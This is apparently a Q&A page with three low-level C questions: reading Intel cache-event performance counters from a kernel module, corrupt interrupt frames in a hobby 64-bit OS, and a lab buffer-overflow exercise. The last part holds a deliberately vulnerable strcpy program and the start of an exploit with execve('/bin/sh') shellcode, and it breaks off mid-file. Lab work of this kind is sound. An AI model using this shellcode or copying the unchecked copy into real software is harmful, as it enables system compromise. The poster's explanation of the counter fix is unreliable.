I want to monitor the cache request number in the last level cache. I wrote a Linux module to get that information based on the tutorial here.
It compiles and runs, but the output is always 0. In other words, when I use rdmsr, it always gives me edx=0, eax=0. I even tried the demo code from the tutorial, and the output is still 0.
I've been stuck on this problem for a whole week. Could anyone help me point out the mistake I made in the program?
I know there are existing programs that do the same thing, but I have to learn how to write the code myself, because I want to monitor cache requests in the Xen hypervisor. I cannot use those tools in Xen unless I incorporate them into Xen's hypervisor, which seems like more work.
/*
* Record the cache miss rate of Intel Sandybridge cpu
* To confirm the event is correctly set!
*/
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
/* The four event-select MSRs; the index goes in %ecx for wrmsr. */
#define PERFEVTSEL0 0x186
#define PERFEVTSEL1 0x187
#define PERFEVTSEL2 0x188
#define PERFEVTSEL3 0x189
/*
 * The four counter MSRs, one per selector above (PERFEVTSELn <-> PMCn).
 * The indices are consecutive; PMC2 must not repeat PMC1's value, otherwise a
 * counter programmed through PERFEVTSEL2 is read back from the wrong MSR.
 */
#define PMC0 0xc1
#define PMC1 0xc2
#define PMC2 0xc3
#define PMC3 0xc4
/*Intel Software Developer Manual Page 2549*/ /*L1I L1D cache events has not been confirmed!*/
/*L1 Instruction Cache Performance Tuning Events*/
#define L1I_ALLHIT_EVENT 0x80
#define L1I_ALLHIT_MASK 0x01
#define L1I_ALLMISS_EVENT 0x80 /*confirmed*/
#define L1I_ALLMISS_MASK 0x02 /*confirmed*/
/*L1 Data Cache Performance Tuning Events*/
/*Intel does not have the ALLREQ Miss mask; have to add LD_miss and ST_miss*/
#define L1D_ALLREQ_EVENT 0x43
#define L1D_ALLREQ_MASK 0x01
#define L1D_LDMISS_EVENT 0x40
#define L1D_LDMISS_MASK 0x01
#define L1D_STMISS_EVENT 0x28
#define L1D_STMISS_MASK 0x01
/*L2 private cache for each core*/ /*confirmed*/
#define L2_ALLCODEREQ_MASK 0x30
#define L2_ALLCODEMISS_MASK 0x20
/*
 * The "all request"/"all miss" masks are currently aliases of the code-only
 * masks; the original notes 0xFF and 0xAA as the alternative values.
 */
#define L2_ALLREQ_EVENT 0x24
#define L2_ALLREQ_MASK L2_ALLCODEREQ_MASK /*0xFF*/
#define L2_ALLMISS_EVENT 0x24
#define L2_ALLMISS_MASK L2_ALLCODEMISS_MASK /*0xAA*/
/*L3 shared cache*/ /*confirmed*/
/*Use the last level cache event and mask*/
#define L3_ALLREQ_EVENT 0x2E
#define L3_ALLREQ_MASK 0x4F
#define L3_ALLMISS_EVENT 0x2E
#define L3_ALLMISS_MASK 0x41
/* Bits 16 and 17 of an event-select value: count in user / OS mode. */
#define USR_BIT (0x01UL << 16)
#define OS_BIT (0x01UL << 17)
/*
 * Helpers that edit an event-select value in place. Every argument is
 * parenthesized and each helper operates on the variable it is given (the
 * USR clear helper previously ignored its parameter and touched a variable
 * literally named eax).
 */
#define SET_MSR_USR_BIT(eax) ((eax) |= USR_BIT)
#define CLEAR_MSR_USR_BIT(eax) ((eax) &= (~USR_BIT))
#define SET_MSR_OS_BIT(eax) ((eax) |= OS_BIT)
#define CLEAR_MSR_OS_BIT(eax) ((eax) &= (~OS_BIT))
/* Event number occupies bits 0-7, unit mask bits 8-15. */
#define SET_EVENT_MASK(eax, event, umask) ((eax) |= ((event) | ((umask) << 8)))
/*MSR EN flag: when set start the counter!*/
#define MSR_ENFLAG (0x1<<22)
/* 32bit insn v3*/
/*
 * rtxen_write_msr - program one MSR with two consecutive wrmsr instructions.
 * @eax: low 32 bits to write; MSR_ENFLAG is OR-ed into it before the write.
 * @ecx: index of the MSR to write.
 *
 * The first wrmsr stores 0 (edx:eax = 0) into the MSR, the second stores
 * (@eax | MSR_ENFLAG) with edx = 0.
 * NOTE(review): because MSR_ENFLAG is always OR-ed in, a caller cannot use
 * this helper to write a value with that bit clear -- confirm this is intended.
 */
static inline void rtxen_write_msr(uint32_t eax, uint32_t ecx)
{
/* Step 1: write zero to the target MSR. */
__asm__ __volatile__ ("movl %0, %%ecx\n\t"
"xorl %%edx, %%edx\n\t"
"xorl %%eax, %%eax\n\t"
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx)
: "eax", "ecx", "edx" /* all clobbered */);
/* Step 2: force the enable flag on, then write the caller's value. */
eax |= MSR_ENFLAG;
__asm__("movl %0, %%ecx\n\t" /* ecx contains the number of the MSR to set */
"xorl %%edx, %%edx\n\t"/* edx contains the high bits to set the MSR to */
"movl %1, %%eax\n\t" /* eax contains the low bits to set the MSR to */
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx), "m" (eax)
: "eax", "ecx", "edx" /* clobbered */);
}
/*
 * rtxen_read_msr - execute rdmsr for the MSR whose index is stored in *ecx.
 * @ecx: pointer to the MSR index (only read).
 * @eax: receives the value rdmsr leaves in eax (callers treat it as the low
 *       32 bits of the result).
 * @edx: receives the value rdmsr leaves in edx (callers treat it as the high
 *       32 bits of the result).
 */
static inline void rtxen_read_msr(uint32_t* ecx, uint32_t *eax, uint32_t* edx)
{ __asm__ __volatile__(\
"rdmsr"\
:"=d" (*edx), "=a" (*eax)\
:"c"(*ecx)
);
}
/*
 * delay - generate some memory traffic by filling a 1000-byte stack array.
 *
 * The array is declared volatile so that every store is really emitted; with a
 * plain local array the compiler may drop the whole loop as dead code, leaving
 * nothing for the counter to observe.
 */
static inline void delay(void)
{
    volatile char tmp[1000];
    int i;

    for (i = 0; i < 1000; i++) {
        /* Only the access matters; the stored value is truncated to a char. */
        tmp[i] = (char)(i * 2);
    }
}
/* Selects which measurement init_module() performs. */
enum cache_level {
    UOPS = 0, /* the "UOPS Demo" path */
    L1I  = 1, /* L1 instruction cache */
    L1D  = 2, /* L1 data cache */
    L2   = 3, /* per-core L2 cache */
    L3   = 4  /* shared last-level cache */
};
/*
 * init_module - module entry point: program one event-select MSR, read the
 * matching counter MSR once and log the result with printk.
 *
 * The measurement is chosen by the local variable op, which is hard-wired to
 * UOPS, so the L3 branch does not run as written.
 *
 * Return: always 0.
 */
int init_module(void)
{
enum cache_level op;
uint32_t eax, edx, ecx;
uint64_t l3_all;
op = UOPS;
switch(op)
{
case UOPS:
/*
 * With the field layout used by SET_EVENT_MASK/USR_BIT this value is
 * event 0x0E, unit mask 0x01, user-mode bit set.
 */
eax = 0x0001010E;
/* Also done inside rtxen_write_msr(); set here so the log line shows it. */
eax |= MSR_ENFLAG;
/* 0x187 is the value of PERFEVTSEL1. */
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
/* 0xc2 is the value of PMC1; eax/edx are preset to non-zero markers. */
ecx = 0xc2;
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
/* Build the event-select value field by field. */
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
/*
 * NOTE(review): the counter read here has to be the one paired with
 * PERFEVTSEL2 -- verify the value of PMC2 against that pairing.
 */
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
/* Combine the two halves: edx is the upper 32 bits, eax the lower. */
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}
/*
* A non 0 return means init_module failed; module can't be loaded.
*/
return 0;
}
/*
 * cleanup_module - module exit hook. It only logs a message; the MSRs written
 * by init_module() are left as they are.
 */
void cleanup_module(void)
{
printk(KERN_INFO "Goodbye world 1.\n");
}
The result I have is:
[ 1780.946584] UOPS Demo: write_msr: eax=0x0001010e, ecx=0x00000187
[ 1780.946590] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
[ 1818.595055] Goodbye world 1.
[ 1821.153947] UOPS Demo: write_msr: eax=0x0041010e, ecx=0x00000187
[ 1821.153950] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
I finally solved it with the help of @Manuel Selva!
The correct flow of setting a perf. counter is:
Step 1: set msr and enable the counter by setting the EN bit in eax;
Step 2: stop the counter by writing to msr
Step 3: read the counter
I missed step 2, which is why it always gave me 0. It makes sense for the read to report 0 if I read the counter before stopping it.
The correct code of the switch statement is as follows:
/*
 * Revised measurement sequence: program the selector, stop the counter by
 * rewriting the selector, then read the counter MSR.
 */
switch(op)
{
case UOPS:
/* 0x0051010E = 0x0001010E plus bit 20 and bit 22 (MSR_ENFLAG). */
eax = 0x0051010E;
eax |= MSR_ENFLAG;
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
/*
 * Stop counting: same value with bit 22 cleared.
 * NOTE(review): rtxen_write_msr() as shown earlier ORs MSR_ENFLAG into its
 * argument, so verify that this write really reaches the MSR with bit 22 clear.
 */
eax = 0x0011010E;
rtxen_write_msr(eax,ecx);
/* Read the counter (0xc2 is the value of PMC1). */
ecx = 0xc2;
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
eax |= (1<<20); //INT bit: counter overflow
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
/* Rewrite the selector with the enable flag cleared (see the note above). */
eax &= (~MSR_ENFLAG);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "stop the counter, eax=%#010x\n", eax);
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
/* edx is the upper 32 bits of the count, eax the lower 32 bits. */
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}
Related
I am trying to write my own operating system. Recently I wanted to turn it into a 64-bit operating system (it used to be 32-bit), but unfortunately that broke quite a bit. I set up the IDT and everything else, but when an ISR or an IRQ is called, the stack frame that is passed to the handler is corrupt/wrong. By corrupt/wrong I mean, for example, that int_no is 0 in all cases, the error code is always zero, and all the registers are zero. I just get some garbage value in ss.
Here is the struct for the stack frame:
/*
 * Stack image seen by the C interrupt handlers, lowest address first.
 * The field order must mirror the push order of the entry stubs, and the
 * structure is packed so that no padding is inserted.
 */
typedef struct {
    /* general-purpose registers saved by the stub */
    uint64_t rdi;
    uint64_t rsi;
    uint64_t rbp;
    uint64_t useless; /* slot that is skipped, not restored, on exit */
    uint64_t rbx;
    uint64_t rdx;
    uint64_t rcx;
    uint64_t rax;
    uint64_t r8;
    uint64_t r9;
    uint64_t r10;
    uint64_t r11;
    uint64_t r12;
    uint64_t r13;
    uint64_t r14;
    uint64_t r15;
    /* vector number and error code (real or dummy) */
    uint64_t int_no;
    uint64_t err_code;
    /* return frame consumed by iretq */
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
} __attribute__((packed)) interrupt_frame_t;
And here is my main IDT file:
#include "IDT.h"
/*
 * PUSHALL - asm text that saves the 16 general-purpose registers.
 *
 * Registers are pushed r15 first and rdi last, so rdi ends up at the lowest
 * address. The rsp slot only exists to keep the layout regular. The fragment
 * switches to Intel syntax and back to AT&T syntax for the surrounding code.
 *
 * The last line of the macro must NOT end in a backslash: a continuation there
 * splices the following #define into this macro and leaves POPALL undefined.
 */
#define PUSHALL \
    ".intel_syntax noprefix\n\t" \
    "push r15\n\t" \
    "push r14\n\t" \
    "push r13\n\t" \
    "push r12\n\t" \
    "push r11\n\t" \
    "push r10\n\t" \
    "push r9\n\t" \
    "push r8\n\t" \
    "push rax\n\t" \
    "push rcx\n\t" \
    "push rdx\n\t" \
    "push rbx\n\t" \
    "push rsp\n\t" \
    "push rbp\n\t" \
    "push rsi\n\t" \
    "push rdi\n\t" \
    ".att_syntax prefix\n\t"

/*
 * POPALL - asm text that undoes PUSHALL in reverse order.
 *
 * The saved rsp slot is skipped with "add rsp, 8" instead of being popped, and
 * the final "add rsp, 0x10" discards the interrupt number and the error code
 * that the entry stub pushed before PUSHALL.
 */
#define POPALL \
    ".intel_syntax noprefix\n\t" \
    "pop rdi\n\t" \
    "pop rsi\n\t" \
    "pop rbp\n\t" \
    "add rsp, 8\n\t" \
    "pop rbx\n\t" \
    "pop rdx\n\t" \
    "pop rcx\n\t" \
    "pop rax\n\t" \
    "pop r8\n\t" \
    "pop r9\n\t" \
    "pop r10\n\t" \
    "pop r11\n\t" \
    "pop r12\n\t" \
    "pop r13\n\t" \
    "pop r14\n\t" \
    "pop r15\n\t" \
    "add rsp, 0x10\n\t" \
    ".att_syntax prefix\n\t"
/* Common body for interrupt handler */
/*
 * Pushes the interrupt number, saves the registers (PUSHALL), passes the
 * resulting stack pointer to intfunc in rdi, and on return restores the
 * registers (POPALL, which also drops int_no and err_code) before iretq.
 * rsp is lowered by 0x28 around the call and raised again afterwards.
 */
#define MAKE_INTERRUPT_COMMON_STUB(intno, intfunc) \
"push $"#intno"\n\t" \
PUSHALL \
"mov %rsp, %rdi\n\t"\
"sub $0x28, %rsp\n\t"\
"cld\n\t" \
"call " #intfunc "\n\t" \
"add $0x28, %rsp\n\t" /* Undo the sub $0x28 made before the call */ \
POPALL \
"iretq \n\t"
/*
 * Same sequence for hardware IRQs, but without the rsp adjustment around the
 * call.
 * NOTE(review): confirm the stack alignment intfunc sees at the call is what
 * the compiler-generated handler expects.
 */
#define MAKE_IRQ_COMMON_STUB(intno, intfunc) \
"push $"#intno"\n\t" \
PUSHALL \
"mov %rsp, %rdi\n\t"\
"cld\n\t" \
"call " #intfunc "\n\t" \
POPALL \
"iretq \n\t"
/* Make interrupt for exception without error code. Push a dummy value for the
 * error code in its place, then a unique interrupt number (intno) so that a
 * handler can be multiplexed if needed. The common stub saves the
 * general-purpose registers so that they are available to the interrupt
 * function (intfunc) and restores them upon exit.
 *
 * intentry: Is the interrupt entry point that can be used in an Interrupt
 * Descriptor Table (IDT) entry.
 * intfunc: Is the C interrupt function that the stub calls to do processing
 * intno: Interrupt number. Can be used to multiplex multiple interrupts to one
 * intfunc handler.
 */
#define MAKE_INTERRUPT(intentry, intfunc, intno) \
extern void intentry (void); \
__asm__(".global " #intentry "\n\t" \
".align 16\n\t" \
#intentry ":\n\t" \
"push $0\n\t" /* Push dummy error code */ \
MAKE_INTERRUPT_COMMON_STUB(intno, intfunc));
/* Make the entry point for a hardware IRQ. Identical to MAKE_INTERRUPT except
 * that the body comes from MAKE_IRQ_COMMON_STUB; a dummy error code is pushed
 * so the frame has the same shape as for exceptions.
 *
 * intentry: Entry point symbol to install in the IDT.
 * intfunc: C function the stub calls.
 * intno: Number pushed for the handler (the IRQ number in the uses below).
 */
#define MAKE_IRQ(intentry, intfunc, intno) \
extern void intentry (void); \
__asm__(".global " #intentry "\n\t" \
".align 16\n\t" \
#intentry ":\n\t" \
"push $0\n\t" /* Push dummy error code */ \
MAKE_IRQ_COMMON_STUB(intno, intfunc));
/* Make interrupt for exception with error code. The processor pushes the error code
 * after the return address automatically, so no dummy value is pushed here.
 * Pushes a unique interrupt number (intno) after the error code so that a handler
 * can be multiplexed if needed. The common stub saves the general-purpose
 * registers so that they are available to the interrupt function (intfunc)
 * and restores them upon exit.
 *
 * intentry: This is the interrupt entry point that can be used in an Interrupt
 * Descriptor Table (IDT) entry.
 * intfunc: Is the C interrupt function that the stub calls to do processing
 * intno: Interrupt number. Can be used to multiplex multiple interrupts to one
 * intfunc handler.
 */
#define MAKE_INTERRUPT_ERRCODE(intentry, intfunc, intno) \
extern void intentry (void); \
__asm__(".global " #intentry "\n" \
".align 16\n\t" \
#intentry ":\n\t" \
MAKE_INTERRUPT_COMMON_STUB(intno, intfunc));
/*
 * Entry stubs for the CPU exceptions. Vectors 8, 10-14, 17 and 30 use the
 * ERRCODE variant, i.e. no dummy error code is pushed for them.
 */
MAKE_INTERRUPT (isr0, isr0_handler, 0x00)
MAKE_INTERRUPT (isr1, isr1_handler, 0x01)
MAKE_INTERRUPT (isr2, isr2_handler, 0x02)
MAKE_INTERRUPT (isr3, isr3_handler, 0x03)
MAKE_INTERRUPT (isr4, isr4_handler, 0x04)
MAKE_INTERRUPT (isr5, isr5_handler, 0x05)
MAKE_INTERRUPT (isr6, isr6_handler, 0x06)
MAKE_INTERRUPT (isr7, isr7_handler, 0x07)
MAKE_INTERRUPT_ERRCODE(isr8, isr8_handler, 0x08)
MAKE_INTERRUPT (isr9, isr9_handler, 0x09)
MAKE_INTERRUPT_ERRCODE(isr10, isr10_handler, 0x0a)
MAKE_INTERRUPT_ERRCODE(isr11, isr11_handler, 0x0b)
MAKE_INTERRUPT_ERRCODE(isr12, isr12_handler, 0x0c)
MAKE_INTERRUPT_ERRCODE(isr13, isr13_handler, 0x0d)
MAKE_INTERRUPT_ERRCODE(isr14, isr14_handler, 0x0e)
/* Reserved 0x0f */
/* NOTE(review): vectors 0x10-0x1e are all routed to isr0_handler -- confirm this is intended. */
MAKE_INTERRUPT (isr16, isr0_handler, 0x10)
MAKE_INTERRUPT_ERRCODE(isr17, isr0_handler, 0x11)
MAKE_INTERRUPT (isr18, isr0_handler, 0x12)
MAKE_INTERRUPT (isr19, isr0_handler, 0x13)
MAKE_INTERRUPT (isr20, isr0_handler, 0x14)
/* Reserved 0x15 to 0x1d */
MAKE_INTERRUPT_ERRCODE(isr30, isr0_handler, 0x1e)
/* Reserved 0x1f */
/* IRQ handlers: the number pushed is the IRQ line (0-15), not the IDT vector. */
MAKE_IRQ (irq0, irq0_handler, 0x0)
MAKE_IRQ (irq1, irq1_handler, 0x1)
MAKE_IRQ (irq2, irq2_handler, 0x2)
MAKE_IRQ (irq3, irq3_handler, 0x3)
MAKE_IRQ (irq4, irq4_handler, 0x4)
MAKE_IRQ (irq5, irq5_handler, 0x5)
MAKE_IRQ (irq6, irq6_handler, 0x6)
MAKE_IRQ (irq7, irq7_handler, 0x7)
MAKE_IRQ (irq8, irq8_handler, 0x8)
MAKE_IRQ (irq9, irq9_handler, 0x9)
MAKE_IRQ (irq10, irq10_handler, 0xA)
MAKE_IRQ (irq11, irq11_handler, 0xB)
MAKE_IRQ (irq12, irq12_handler, 0xC)
MAKE_IRQ (irq13, irq13_handler, 0xD)
MAKE_IRQ (irq14, irq14_handler, 0xE)
MAKE_IRQ (irq15, irq15_handler, 0xF)
/*
 * init_idt_entry - fill one slot of the global _idt_entries table.
 * @num:    index of the slot to write.
 * @offset: handler address, split into three pieces below.
 * @select: value stored in the selector field.
 * @flags:  value stored in the flags field.
 *
 * NOTE(review): @offset is an unsigned int, so the piece stored in offset2
 * (bits 32 and up) is always 0 -- confirm handlers never live above 4 GiB,
 * or widen the parameter together with its prototype.
 */
void init_idt_entry(int num, unsigned int offset, unsigned short select,
                    unsigned short flags)
{
    /* Split the address into bits 0-15, bits 16-31 and bits 32 and up. */
    const unsigned short low_part  = (unsigned short)(offset & 0xFFFF);
    const unsigned short mid_part  = (unsigned short)(offset >> 16);
    const unsigned int   high_part = (unsigned int)((unsigned long long)offset >> 32);

    _idt_entries[num].selector = select;
    _idt_entries[num].flags    = flags;
    _idt_entries[num].offset0  = low_part;
    _idt_entries[num].offset1  = mid_part;
    _idt_entries[num].offset2  = high_part;
}
///////////////////////////////////////
/*
 * idt_flush - execute lidt with the descriptor that idtr points to.
 * @idtr: descriptor passed to lidt as a memory operand.
 */
void idt_flush(struct idt *idtr)
{
asm volatile("lidt %0" :: "m"(*idtr));
}
/* I/O ports of the first and second interrupt controller. */
#define PIC1_COMMAND 0x20
#define PIC1_DATA 0x21
#define PIC2_COMMAND 0xA0
#define PIC2_DATA 0xA1
/* End-of-interrupt command byte (not used in the code shown here). */
#define PIC_EOI 0x20
/* Bits OR-ed together for the first initialization word sent by init_pic(). */
#define ICW1_INIT 0x10
#define ICW1_ICW4 0x01
/* Value sent as the last initialization word by init_pic(). */
#define ICW4_8086 0x01
/*
 * init_pic - re-initialize both interrupt controllers.
 *
 * Saves the bytes currently readable from the two data ports, sends the
 * initialization sequence (the controllers get the offsets 0x20 and 0x28),
 * and finally writes the saved bytes back. io_wait() is called between
 * port accesses.
 */
void init_pic()
{
/*
 Earlier variant with literal port numbers, kept for reference:
outb(0x20,0x11);
outb(0xA0,0x11);
outb(0x21, 0x20);
outb(0xA1, 40);
outb(0x21, 0x04);
outb(0xA1, 0x02);
outb(0x21, 0x01);
outb(0xA1, 0x01);
outb(0x21, 0x0);
outb(0xA1, 0x0);
*/
unsigned char a1, a2;
/* Remember what the data ports currently hold. */
a1 = inb(PIC1_DATA);
io_wait();
a2 = inb(PIC2_DATA);
io_wait();
/* First word: start initialization, a fourth word will follow. */
outb(PIC1_COMMAND, ICW1_INIT | ICW1_ICW4);
io_wait();
outb(PIC2_COMMAND, ICW1_INIT | ICW1_ICW4);
io_wait();
/* Second word: vector offsets 0x20 and 0x28. */
outb(PIC1_DATA, 0x20);
io_wait();
outb(PIC2_DATA, 0x28);
io_wait();
/* Third word: 4 for the first controller, 2 for the second. */
outb(PIC1_DATA, 4);
io_wait();
outb(PIC2_DATA, 2);
io_wait();
/* Fourth word. */
outb(PIC1_DATA, ICW4_8086);
io_wait();
outb(PIC2_DATA, ICW4_8086);
io_wait();
/* Write back the bytes saved at the top. */
outb(PIC1_DATA, a1);
io_wait();
outb(PIC2_DATA, a2);
}
/*
 * init_idt - build the IDT, remap the PIC, load the IDT, bring up the PS/2
 * devices and finally enable interrupts.
 *
 * The table has 256 entries of 16 bytes. Every slot is first pointed at isr0
 * as a catch-all, then the exception and IRQ slots get their own entry
 * stubs. Status messages are drawn with drawStringToCursor().
 *
 * NOTE(review): the handler addresses are cast to int before being passed to
 * init_idt_entry(), which truncates them to 32 bits -- confirm the kernel is
 * linked below 4 GiB.
 */
void init_idt()
{
    _idt_entries = RequestPage();
    /* The limit field holds the offset of the LAST valid byte: size - 1. */
    Tidt.limit = 16 * 256 - 1;
    Tidt.base = _idt_entries;
    memset(_idt_entries, 0, 16*256);

    /* Catch-all: route every vector to isr0 until a specific stub is set. */
    for(int i = 0; i < 256 ; i++){
        init_idt_entry(i,(int)&isr0,0x08, 0x8E);
    }

    /* CPU exceptions */
    init_idt_entry(0,(int)&isr0,0x08, 0x8E);
    init_idt_entry(1,(int)&isr1,0x08, 0x8E);
    init_idt_entry(2,(int)&isr2,0x08, 0x8E);
    init_idt_entry(3,(int)&isr3,0x08, 0x8E);
    init_idt_entry(4,(int)&isr4,0x08, 0x8E);
    init_idt_entry(5,(int)&isr5,0x08, 0x8E);
    init_idt_entry(6,(int)&isr6,0x08, 0x8E);
    init_idt_entry(7,(int)&isr7,0x08, 0x8E);
    init_idt_entry(8,(int)&isr8,0x08, 0x8E);
    init_idt_entry(9,(int)&isr9,0x08, 0x8E);
    init_idt_entry(10,(int)&isr10,0x08, 0x8E);
    init_idt_entry(11,(int)&isr11,0x08, 0x8E);
    init_idt_entry(12,(int)&isr12,0x08, 0x8E);
    init_idt_entry(13,(int)&isr13,0x08, 0x8E);
    init_idt_entry(14,(int)&isr14,0x08, 0x8E);
    /* ISR15 is reserved */
    init_idt_entry(16,(int)&isr16,0x08, 0x8E);
    init_idt_entry(17,(int)&isr17,0x08, 0x8E);
    init_idt_entry(18,(int)&isr18,0x08, 0x8E);
    init_idt_entry(19,(int)&isr19,0x08, 0x8E);
    init_idt_entry(20,(int)&isr20,0x08, 0x8E);
    /* ISR21 to ISR2F are reserved */
    init_idt_entry(30,(int)&isr30,0x08, 0x8E);

    /* IRQ handlers: IRQ n is installed at vector 32 + n */
    init_idt_entry(32,(int)&irq0,0x08, 0x8E);
    init_idt_entry(33,(int)&irq1,0x08, 0x8E);
    init_idt_entry(34,(int)&irq2,0x08, 0x8E);
    init_idt_entry(35,(int)&irq3,0x08, 0x8E);
    init_idt_entry(36,(int)&irq4,0x08, 0x8E);
    init_idt_entry(37,(int)&irq5,0x08, 0x8E);
    init_idt_entry(38,(int)&irq6,0x08, 0x8E);
    init_idt_entry(39,(int)&irq7,0x08, 0x8E);
    init_idt_entry(40,(int)&irq8,0x08, 0x8E);
    init_idt_entry(41,(int)&irq9,0x08, 0x8E);
    init_idt_entry(42,(int)&irq10,0x08, 0x8E);
    init_idt_entry(43,(int)&irq11,0x08, 0x8E);
    init_idt_entry(44,(int)&irq12,0x08, 0x8E);
    init_idt_entry(45,(int)&irq13,0x08, 0x8E);
    init_idt_entry(46,(int)&irq14,0x08, 0x8E);
    init_idt_entry(47,(int)&irq15,0x08, 0x8E);

    init_pic();
    SetPITSpeed(100);
    drawStringToCursor("Set PIT speed\n",0xffffff, 0x000000);
    idt_flush(&Tidt);

    /* Device bring-up; each init function reports a status code. */
    int s = initPS2Controller();
    if(s == 0) drawStringToCursor("Successfully initialized PS2 Controller\n",0xffffff, 0x000000);
    else drawStringToCursor("A problem occured while initializing PS2 Controller\n",0xffffff, 0x000000);

    s = initKeyboard();
    if(s == 0xFA) drawStringToCursor("Successfully initialized Keyboard Controller\n",0xffffff, 0x000000);
    else drawStringToCursor("A problem occured while initializing Keyboard Controller\n",0xffffff, 0x000000);

    s = initMouse();
    if(s == 0) drawStringToCursor("Successfully initialized Mouse Controller\n",0xffffff, 0x000000);
    else drawStringToCursor("A problem occured while initializing Mouse Controller\n",0xffffff, 0x000000);

    /* Write 0 to both PIC data ports, then enable interrupts. */
    outb(PIC1_DATA, 0);
    outb(PIC2_DATA, 0);
    asm volatile("sti;");
}
I think there may be three possible problems: something is wrong with the way I push the values onto the stack (which seems to me the most likely one), something is wrong with the way I receive them, or something gets overwritten or lost in paging. Yet I couldn't spot the issue. I would be more than happy to post more code here, but here is the entire code if you want to check it out:
https://github.com/Danyy427/OSDEV.git
In this lab, I have exploit.c, stack.c and call_shellcode.c. stack.c has been modified so that it prints out the buffer address and the ebp address. I am running this on a virtual machine with 32-bit Ubuntu 12.04.
I have to use the vulnerable program stack.c and put code in exploit.c in order to create a shell when running my stack executable. Any help is appreciated.
Stack.c is down below Sorry for bad indentation, actual code has proper indentation.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* Receives the value of %ebp captured inside cp(). */
unsigned long int sp;
/*
 * cp - copy str into a 12-byte local buffer and print diagnostic addresses.
 * @str: NUL-terminated input string.
 *
 * Prints the current %ebp (read with 32-bit x86 inline asm) and the address of
 * the local buffer. The copy uses strcpy() with no length check, so any input
 * longer than 11 characters writes past the buffer.
 * NOTE(review): presumably the unchecked copy is deliberate for the lab -- confirm.
 *
 * Return: always 1.
 */
int cp(char *str)
{
// unsigned long int sp;
char buffer[12];
asm("movl %%ebp, %0" : "=r" (sp));
printf("$ebp is 0X%lx\n",sp);
strcpy(buffer, str);
printf("Buffer is at address %p\n",(void*)(&buffer));
return 1;
}
/*
 * main - read up to 517 bytes from the file "badfile" and hand them to cp().
 *
 * The file is now checked for a failed open (previously a missing file passed
 * a NULL stream to fread()) and is closed after reading. The bytes are passed
 * on exactly as read; no terminator is appended.
 *
 * Return: 1 in all cases (the original's exit status on success is kept).
 */
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    (void)argc;
    (void)argv;

    badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }
    fread(str, sizeof(char), 517, badfile);
    fclose(badfile);

    cp(str);
    printf("Returned Properly\n");
    return 1;
}
And exploit.c is down below.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Machine-code bytes for 32-bit x86; the per-line comments give the
 * instruction each byte group encodes. The array also contains the string
 * literal's terminating NUL, so sizeof(shellcode) counts one extra byte.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*
 * main - write a 517-byte buffer to "./badfile".
 *
 * The buffer is filled with 0x90 bytes; the lab's contents are meant to be
 * placed into it at the marked position. Declared as int main (void main is
 * not standard C), and a failed open or write is now reported.
 *
 * Return: 0 on success, 1 if the file could not be opened or written.
 */
int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    (void)argc;
